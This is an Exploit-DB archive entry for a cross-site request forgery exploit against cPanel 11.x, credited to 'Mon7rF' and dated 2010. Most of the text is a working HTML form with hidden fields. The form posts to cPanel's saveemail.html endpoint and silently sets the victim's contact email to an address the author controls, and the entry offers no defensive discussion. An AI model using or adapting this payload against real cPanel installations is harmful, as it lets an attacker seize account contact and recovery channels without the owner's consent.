Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit

2010-11-21T00:00:00
ID EDB-ID:15593
Type exploitdb
Reporter Mon7rF .
Modified 2010-11-21T00:00:00

Description

Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit. Webapps exploit for php platform

                                        
                                            # Exploit Title: Cpanel 11.X Edit E-mail  Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..